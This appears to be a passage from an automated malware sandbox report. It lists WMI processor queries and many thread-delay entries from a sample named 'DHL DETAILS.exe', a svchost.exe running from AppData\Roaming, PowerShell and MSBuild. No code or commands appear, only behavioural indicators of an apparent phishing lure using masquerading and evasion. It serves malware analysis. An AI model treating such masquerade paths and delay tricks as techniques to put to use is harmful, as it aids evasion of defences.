Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 99764	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 99544	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 99406	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 99293	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 99187	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 99078	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 98965	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 98763	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 98655	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 98546	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 98437	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 98325	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 98202	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 98091	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 97980	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 97866	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Thread delayed: delay time: 97749	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99704	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99593	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99098	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98905	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98737	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98472	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97515	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97166	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96899	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96791	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 95453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 94906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91515	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90755	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90497	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90387	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90259	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90136	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 89791	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 76875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 73312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 70937	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 67375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 65000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 64718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 62625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 55468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 53125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 48375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 46000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 43625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 41329	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 38954	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 36579	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 34204	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 31829	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99872
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99765
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99646
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99525
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99405
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99295
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99184
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99068
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98938
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98822
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98717
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98608
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98467
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98354
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98156
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97995
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97888
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97768
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97640
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97500
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97359
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97218
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97082
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96960
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96828
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96716
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96543
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99843
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99714
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99606
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99485
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99370
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99223
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99093
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98961
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98790
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98667
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98515
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98384
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98274
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98119
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97965
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97738
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97531
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97375
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96814
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96623
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 94781
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 94594
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 94441
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 94234
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 94021
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93844
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93730
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93604
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93498
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93383
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93047
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92888
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92701
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92469
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92328
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92166
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91867
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91672
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91531
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91391
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91234
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91068
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90931
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90746
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90624
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90463
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90334
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90156
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 89955
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 89817
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 89688
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 89536
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 89398
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 89209
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 89039
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 88766
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 88618
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 88468
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 88219
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 88070
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 87947
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 87759
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 87531
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 87414
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 87234
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 87000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 86859
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 86719
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 86406
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 85703
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 85216
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 85090
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 84906
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 84749
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 84172
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 84009
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83859
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83688
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83557
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83410
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83266
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 83078
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82945
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82818
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82641
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82453
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82277
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 82094
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 81920
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 81781
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 81617
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 81469
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 81340
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 81000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 80819
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 80609
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 80428
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 80234
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 79797
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 79094
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 77266
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 76985
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 76766
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 76572
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 76328
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 76106
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 75719
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 75500
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 75281
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 75150
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 75000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 74839
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 74729
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 74578
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 74422
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 74263
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 74125
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 73994
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 73844
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 73541
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 73344
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 73184
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 73000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 72838
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 72547
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 71781
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 71313
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 71152
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 70922
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 70700
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 70516
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 70297
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 70110
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 69891
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 69719
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 69585
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 69434
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 68594
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 68344
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 68139
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 67983
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98693
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98224
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96823
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96407
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 95860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 95625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 95391
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99803
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99512
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99377
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99194
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 99024
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98755
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98602
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98478
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98187
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 98042
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97910
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97719
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97516
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97359
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 97211
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96984
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96848
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96562
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 96383
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 95734
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 95328
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 95172
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 95027
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 94906
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 94764
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 94187
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 94024
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93859
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93687
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93562
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93422
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93307
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 93137
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92975
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92851
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92607
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92460
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92292
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 92131
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91935
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91784
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91632
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91490
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91356
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 91172
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90973
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90765
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 90593
